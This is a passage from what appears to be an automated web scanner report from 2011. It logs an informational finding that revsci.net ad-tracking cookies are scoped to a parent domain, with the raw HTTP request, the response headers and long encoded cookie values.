8tLpx9rnTC/yIXatLgCnRv6aYLEy3U8pJDT9wtkd6KT2qZbPcQBgM4ORrhxBc9O31ihCY1TpbDm6tm9V7H1gw45MCvfiqCNYD0WeL0BdsYGEp/0zbPFivFpw4gOTqA2UYMg5eT0TZWZWBpM2XZSAGmFqO2btOFYF1a2MIJNoyJh80yafr4NiTY1OxXjafjc+RMD0giT7KsaW2azmFCvcEn60Z/REYg+MgZhecSnRCHa2jUHNdmQ9Co0JvWgSQrK7rJ0axxgV7pCoLZ7ufXMFzrngcxW/aHeEfuxx2TPMEm+l+qn8yQe1GdQ8OTCrEhhRyzyvNZgxPi+sGIfcqlCX+ZH3ramk2Uf/PZmGc1Q8bttSBIVkuefEQOgcbng3f6sNAx7yQU6ptBrFV0lWFsni+DR+2TNoyVYy/PfomMhoRWE3RhkSrwqbrC8HWnt9hLUZoJwgb/OIqiE/aG4B+pHzGDO+DAQ0a7J+iO1iXPs5qLi1qftz/gGPh4A/pD2/3JiyXka9hUKr0HSpd+wm8Wv1qupg3niAOmB0pjoq28uVdCjpFmiN4MIut0J9pZHhfDtxy+KxP73TCH6U3bXBe7sQ4CwS1F3pVnjZ3pLEeLv7WQHYg4l1fZGzLxcDS3lE+8Z3RHoqRSavkip/CbS2BKPAEvtxPMInncX1NpiW/ErnpASyXgV8Hr9mySxjf9X6S1JxsifdMrjac+AxZmyoPxrgYt8cyzWpuYpdOSMAO+4mozk47z7WkrCtE+3IfrBTXW6FVXXnSt7Th8r4dH1e9MH6kDlEt2GTSyjYWH25Kd9QzMs8J9llw75k3t0CV7Yqr3CNszJ9DOyteaKmnMEpTY6e4IEqVdtmYKipVDDOGYv3DcLFIjKKXwDFBs24C+qPzzAxjRHKNZXSIgNpLt7r9bhZ9QqMwD3AiZHmrPMlo2YtBzckPtbTtyD+PyeV9+JjD4p/GZ+Og+DjOt+WZqLq0YLAB/Qe2VuISmvGPTLlpOMrx9IeIex/IYUNH4xSGi7ifEvVMYyoidyHCSsdCwevi6QoxwtobTeBTpb6f4btqFmtudpHrvHTRCJae2dWI/NXCnsEdUzBqudyjS6+CU5DF23tnR+SaDadcC6TzcELP/n+s1IVWy2iLmZ9NjYpZon1hUcn8UBA98afesh4aLToqGahf+FXK1X3DE42B0Zhzmg2hYHIy22KYkD8R8EOHFzN8ZeJ0ulBrK8q599APhrL+49PksYm7DFv/XJXEEfBAOdkszkCRjXWVkYMZo6HHARG40ewXnt8cJSKVE3oOip9agCbzmrtPWOaReve7oy+yiGTH0bqm/33EU/7cpiLfbVe1LRItAs9d9n7WdHKrB9ddCi+uaUOY/ek4Qs6gcSpEur71zGD5tsQ7Vw0KUM8F/PPsvXJJOhG6jM+N6VIZP8uOwcYFC4upAgZbZDbxbhmwM3O65HTnFP+9izEUTtxyY25+dw71j0N69QT36ivvAflb+/zLwDDLZAFXmVnxCAc2wdNh6DaE+MjZncdOuGlQ5Wn/Uew+p0EC89K7+rT7bJR+pr6UxOXiICqoY5lIcAyNBUiY2BDy/7IiMefgBSVAP/HESHE4w/5rRCDIcIQI1+ZNGCk9ZtS3bynx8tTpKSp8DT/lvMnw0U5L48/QTLX/6iqQTJsw93FKMGq/QUWnQcLAuWAmp5TSa/VSm/65JJqr7DolPkwc1sh2OwiIaWdxaYij7S15UM7PyICrlSR61P8JG4/nZiMiQyrR6dWmEvovD2af+K9xZWq6UYp5MCGn566Fm5pe18hVD8dRGvU6Sd32DBrLe7YIptiyO9O8h06jW9dEJctlukjJ0OMuKg995WdHErA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:36:49 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:36:48 GMT
Content-Length: 1149

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_10678','H07707_11020','
...[SNIP]...

13.71. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/H07707/b3/0/3/0806180/848419951.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF4kmhOHMQJvAtY6gq+mkAZPosg7ZjSjmgIGbYEtpU+w6+9L4ioURjDVUZb5s2bJaZJyc3lSTsOodoc+LzjgnPXWfftsdz6As2U+S4m3sZ93GnJHkwYOujESwdtKPV2XiklIXPPxY08/+jghS00wcrqZXadzeLZbfrn9ShlwBQ2xmbpA283BtMERrEkp0Jl7AlGaEi8uw/pmdbkTDTCxPk3RxS+r7mTK51H+dLGRbW1fSty/wzVcn4GiBJEhk/0uP0JFLwQAUiAigtm0ZNVycI9AGE/kbo+Gm2GaMwx2IDZVAxGSGKhVfyxDow7LMEpP+/5AxB2aqXpAeWvKTgzd0wbPD0VLITZHo4oKcp6znXDZ/0QtZDxMyG+eh98ur0yF4RcpWqIFje74P6+IbKGLCNtlohZ7Nav9yQLQTHzDaAO7J7qQoTim2Po4jbIQeMv4V1ddr3kuTn07MfTvRxxboUYTCuOfPSwiCu87XOT4VkUrTUsApznyu8h9UrtX1A+eGVmZHV1i9H5FVlSMYV26zae1BGTaVDu19oJh0g6OQ/s8arz/cmOTmFie/7fnhKouJ+5wZJLzMT79s7HngcVxnNORtmtkxap8qWggfgODBjtQ8ig0EDjcYoKBHHKBVVdroIASuQN7mVEL0K0TzsgMMWXaKWYBW9/iOx9pWkUNPSZL0M2RzvR9D/7jyN/29EhW9QJ959OWVt+j0usQmpIR7mRCF/ajlARlpFSZwaumyPoKorInGvgmN+DJxH9uO8o1yz+7oRSaHzNp10QI1YjBXWMklCIpzZV9sYpcGp7usKbFyeozpl+ePO2/9SPMsdM6qLGHvuxxE=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/
rtc_cPyi=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:40:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/848419951.js?D=DM_LOC%3Dhttp%253A%252F%252Ftopics.nytimes.com%252Ftopics%252Freference%252Ftimestopics%252Fsubjects%252Fp%252Fprivate_equity%252Findex.html%253Finline%253Dnyt-classifier%26DM_CAT%3DNYTimesglobal%2520%253E%2520Times%2520Topics%26DM_REF%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F10%252Fapollo-to-buy-out-american-idol-owner%252F%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rtc_D9GE=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; 